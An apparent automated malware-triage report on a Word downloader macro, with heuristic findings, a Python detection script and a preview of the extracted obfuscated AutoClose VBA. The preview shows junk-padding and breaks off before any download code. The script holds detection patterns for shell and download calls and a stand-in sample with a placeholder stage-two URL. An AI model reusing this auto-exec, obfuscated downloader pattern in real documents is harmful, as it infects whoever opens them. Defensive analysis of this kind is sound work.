Verdict: MALICIOUS (risk score 222)

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

Malware Insights
ClamAV identifies the sample as Doc.Downloader.Valyria-6595163-0, a downloader signature. The recovered VBA project contains an AutoClose procedure, which Word runs automatically when the document is closed (once macros are enabled), so no further user interaction is needed for the code to execute. Together with the GetObject call flagged below, this is consistent with a macro that fetches and runs a second-stage payload, a common malware distribution technique. The extracted source is padded with junk literal assignments and no-op For/Fix loops (see the preview below), so the download logic itself is not visible in the first lines shown.
Heuristics (7)

- ClamAV: Doc.Downloader.Valyria-6595163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): an AutoClose procedure is present and runs when the document is closed.
- GetObject call (high, OLE_VBA_GETOBJ): the macro calls GetObject, which can obtain a COM object and is a common route to code execution from a macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macros and documents whose source extraction failed, where no visible source is available.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no modern VBA project recovered and no stronger macro-virus family marker present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that a VBA project was in fact recovered for this sample (macros.bas, listed under extracted artifacts), so treat this finding as weak corroboration rather than an independent signal.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached it. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace that Office writes into documents, not a network indicator.
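A source-level re-implementation of the OLE_VBA_AUTOCLOSE, OLE_VBA_GETOBJ and EMBEDDED_URL checks, plus a junk-line count for the padding style visible in the macro preview, as an added example that is not the analyzer's own code. It scans VBA text such as the macros.bas that olevba extracts. Both inline samples are constructed for the example (the malicious one is modeled on the preview and uses a placeholder example.invalid URL); `triage_file` is optional, calls oletools' real `VBA_Parser.extract_macros()`, and is only needed to run the scan on a document. The severity mapping is a simplification of the report's own, and the block does not reproduce the OLE_VBA_PCODE_AUTOEXEC_EXEC check, which scans the compiled p-code stream rather than source.

```python
"""Triage extracted VBA source for auto-exec entry points, execution-capable
tokens, embedded URLs and junk padding. Added example, not analyzer code."""
import re

# Procedures Word/Excel run without a click (the report's Auto_Close finding).
AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|"
    r"Document_Open|Document_Close|Workbook_Open|Workbook_Close)\s*\(",
    re.I | re.M,
)

# Tokens that reach object creation, shell execution or download.
EXEC_TOKENS = {
    "GetObject": r"\bGetObject\s*\(",
    "CreateObject": r"\bCreateObject\s*\(",
    "Shell": r"\bShell\s*\(",
    "WScript.Shell": r"\bWScript\.Shell\b",
    "URLDownloadToFile": r"\bURLDownloadToFile",
    "XMLHTTP": r"XMLHTTP",
    "ADODB.Stream": r"\bADODB\.Stream\b",
    "powershell": r"\bpowershell\b",
}

# Filler of the kind the preview is padded with: bare Dim, literal assignment,
# Fix(n) inside a short For loop, Val("n") & "str", On Error Resume Next.
JUNK = re.compile(
    r'^\s*(?:Dim\s+\w+|\w+\s*=\s*(?:\d+|"[^"]*"|Fix\(\d+\)|Val\("\d+"\)\s*&\s*"[^"]*")'
    r'|For\s+\w+\s*=\s*\d+\s+To\s+\d+|Next|On Error Resume Next)\s*$',
    re.I,
)
URL = re.compile(r"""https?://[^\s"'<>)]+""")


def triage_vba(source: str) -> dict:
    """Scan decoded VBA source text and return the findings as a dict."""
    code = [ln for ln in source.splitlines()
            if ln.strip() and not ln.lstrip().startswith("Attribute ")]
    auto = sorted({m.group(1) for m in AUTOEXEC.finditer(source)})
    tokens = [name for name, pat in EXEC_TOKENS.items()
              if re.search(pat, source, re.I)]
    urls = sorted(set(URL.findall(source)))
    # A literal assignment that carries a URL is payload staging, not padding.
    junk = sum(1 for ln in code if JUNK.match(ln) and not URL.search(ln))
    if auto and tokens:
        severity = "high"    # runs on its own and can execute/download
    elif auto or tokens:
        severity = "medium"  # one half of the chain only
    else:
        severity = "info"    # macro present, nothing suspicious matched
    return {"autoexec": auto, "exec_tokens": tokens, "urls": urls,
            "junk_lines": junk, "code_lines": len(code), "severity": severity}


def triage_file(path: str) -> dict:
    """Optional: pull the macro source out of a document with oletools first."""
    from oletools.olevba import VBA_Parser  # real oletools API, optional dependency
    parser = VBA_Parser(path)
    source = "\n".join(vba_code for _, _, _, vba_code in parser.extract_macros())
    return triage_vba(source)


# Constructed sample modeled on the report's preview; the URL is a placeholder.
SAMPLE_MALICIOUS = '''Attribute VB_Name = "ThisDocument"
Sub AutoClose()
    FOmOBehEZeKEaiOS = 47318
    Dim zUDaZaSoalUfIx
    For xAtEmyLOwPAaETeainIc = 8 To 12
        Dim gOqAQopazoTEFEVYwIfG
        gOqAQopazoTEFEVYwIfG = Fix(87552)
    Next
    sigEzYvihoaeJYXejw = "sEFuMakyS"
    duTegenAaofeQREtJOK = Val("75394") & "zOLUQUtIKOiiJTUxu"
    On Error Resume Next
    sUrl = "http://example.invalid/stage2"
    Set o = GetObject(sAlias)
    o.Run sCmd, 0
End Sub
'''

# Constructed benign macro: no auto-exec entry point, no execution tokens.
SAMPLE_BENIGN = '''Sub FormatTable()
    Dim r As Range
    Set r = ActiveDocument.Tables(1).Range
    r.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, triage_vba(src))
```

The junk count is the useful extra signal here: the preview is almost entirely literal assignments and Fix() loops, and a high ratio of such lines to total lines is itself worth surfacing even when the token scan is what drives the severity.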
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44088 bytes | 397c0f829cb70ccf41802e3edf0fe35038e1457b1ee2c91a169771ba793cd866 |
Preview: first 1,000 lines of the extracted script (macros.bas)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
mOrYvYzYwyLAgABUxeXYME = "PIopoKaqOTeveNAKolYa"
FOmOBehEZeKEaiOS = 47318
Dim zUDaZaSoalUfIx
sigEzYvihoaeJYXejw = "sEFuMakyS"
Dim xAtEmyLOwPAaETeainIc
For xAtEmyLOwPAaETeainIc = 8 To 12
Dim gOqAQopazoTEFEVYwIfG
gOqAQopazoTEFEVYwIfG = Fix(87552)
Next
zUDaZaSoalUfIx = 37697
Dim DeVecOiegYuXETTUME
Dim BeCYtyhAnOREminyNY
For BeCYtyhAnOREminyNY = 7 To 11
Dim hasYPimeMycex
hasYPimeMycex = Fix(3455)
Next
sihtuGuGASymPAR = "GowuBaHODaTz"
duTegenAaofeQREtJOK = Val("75394") & "zOLUQUtIKOiiJTUxu"
DeVecOiegYuXETTUME = 2276
On Error Resume Next
Dim qetIKOFOrUieLIBIrURol
For qetIKOFOrUieLIBIrURol = 3 To 11
Dim GYBiqIiiURAycIP
GYBiqIiiURAycIP = Fix(22215)
Next
XiPadiWoMAZyMefoweWy = 44454
FYdImeNVYqUQYi = "KiKUmulUZIdeV"
FobIQASeSuGEq = 53049
DOfUgUCyDI = "pinIDEJUNe"
CInugAZysepY = 46713
Dim zePyZykymasOMeKyBo
zePyZykymasOMeKyBo = 20658
Dim LUfyLIJUwuxiHyXuMeQi
For LUfyLIJUwuxiHyXuMeQi = 9 To 11
Dim cYxiHABUZACizacoGOGiw
cYxiHABUZACizacoGOGiw = Fix(94101)
Next
Dim gofEOJaGiZeP
For gofEOJaGiZeP = 6 To 13
Dim MeGonUxoi
MeGonUxoi = Fix(42429)
Next
Dim XYVoXyGIPikAKiVASuF
WIQYiYvAtifuvEwI = Val("96385") & "jyZKIciSAlyjyny"
Dim geMItiLeserIcNy
For geMItiLeserIcNy = 3 To 11
Dim eSypuFykesalyj
eSypuFykesalyj = Fix(91819)
Next
sinAZApiqeSlYH = Val("37401") & "ZoRyMoJEpyPUjIgoRUfemO"
For XYVoXyGIPikAKiVASuF = 9 To 11
ciJHTYJEViHaEfKYm = 51086
DYnoWiGmyOGaB = 93212
Dim FecANABUma
FecANABUma = 21227
Dim iyZUiYlOaySumUheJep
PExeQiIhoJirugAFA = 33821
Dim zyqoPuiOL
zyqoPuiOL = 36827
Dim HefEMUNUCYKV
HefEMUNUCYKV = 39171
iyZUiYlOaySumUheJep = Fix(85113)
aaSYKAcibODAK = Val("18615") & "zeMyBEryZopIPeGUXa"
WUqfoaoNyqATejoqiHYd = "cPAhifoDOSOSah"
zEggojaJEwAzeHucAZ = 74529
Next
BicKidepiXiCOtaiyQaKa = StrReverse(LTrim(""))
aIqaBuvYceKaR = 78617
WYKApizYai = 58191
HIZoNAtUvoM = Val("11569") & "QOZamAlOtykoIquauKY"
Dim RIkYrupYRiMo
RIkYrupYRiMo = 7291
RESeXIHoHATAheUtaF = "rErFuquabOcyS"
Dim kywZQaFyaINO
todySIPeTATutApILYF = 66517
kywZQaFyaINO = 47622
Dim LAfavAwY
LAfavAwY = 15491
Dim nEQEjsiaIcukUaY
For nEQEjsiaIcukUaY = 5 To 11
Dim JImUTAgoPU
JImUTAgoPU = Fix(5324)
Next
Dim PavceloT
For PavceloT = 3 To 12
Dim MyvIhoviMarePamYGuh
MyvIhoviMarePamYGuh = Fix(92602)
Next
Dim LUzOSakizEhAwOL
Dim NOWOwABYjiTOpImetk
NOWOwABYjiTOpImetk = 71207
iimaKuiYtOfOGciRaNo = "CuSeXYVEvYjEcypu"
For LUzOSakizEhAwOL = 5 To 11
Dim aLaciQkUboBi
aywObzaBiBiqoMoXY = "waHOaEreJOkETul"
Dim cyHCATAboNYMa
cyHCATAboNYMa = 62410
Dim QakkOzyFMok
For QakkOzyFMok = 7 To 11
Dim aefInacYvyTOfoH
aefInacYvyTOfoH = Fix(24288)
Next
aLaciQkUboBi = Fix(27942)
HOfYQoKuxIaObu = Val("363") & "xEjuTUQYLYtaDAloxEMEX"
LOPAFYJYDeTeK = "jUIbyaoKUSolEteLEvaJ"
Next
GAPAmUCUJdUseiyDyB = 37022
BEreWETEnyYvybidy = 26564
Dim mOaUhEnAJuILaGUP
KAdwICoQYj = "KUbOWIVadIgUpAn"
qaHeVevaFEianEzUMX = Val("24545") & "lGOkEcYqEmatEnOHAVE"
xufariMawola = 92507
For mOaUhEnAJuILaGUP = 9 To 12
vEqykoSoSUmlEiYq = 86353
HYLOWuHaNOSygyRO = 32843
Dim niTorYcUMYgACABov
Dim SweRaINUGEPaHi
For SweRaINUGEPaHi = 7 To 11
Dim MiZakOdAJAMitIDiguWUL
MiZakOdAJAMitIDiguWUL = Fix(75807)
Next
niTorYcUMYgACABov = Fix(68945)
Next
Dim gYKyxytEGyTIfATA
MIYvuJAk = "XfURARatywavOQYxu"
For gYKyxytEGyTIfATA = 8 To 10
Dim HyvyTUrYiI
qoGuTAsQOTicaniJYsUU = "HexApEQuBidAMU"
Dim KypucEwyNEPAqiNUGev
KypucEwyNEPAqiNUGev = 6989
HidesYjiRANOWUkYB = 88082
HyvyTUrYiI = Fix(85423)
Dim neulAPUtaXeRyaev
neulAPUtaXeRyaev = 57657
Next
xAziCeWaQe = "PiJOrezAKGYSenE"
FguaHOlIvOaaFirEPo = 70238
ierUqEmAkUCESOf = Val("15223") & "dUjOcoTAfOgyGarO"
Dim XAhuSeiUqygyLYZAV
Dim mUnUHykoiCa
mUnUHykoiCa = 49639
DEWAtAbemYRorYdUNeLak = "XAGY
```

... (truncated)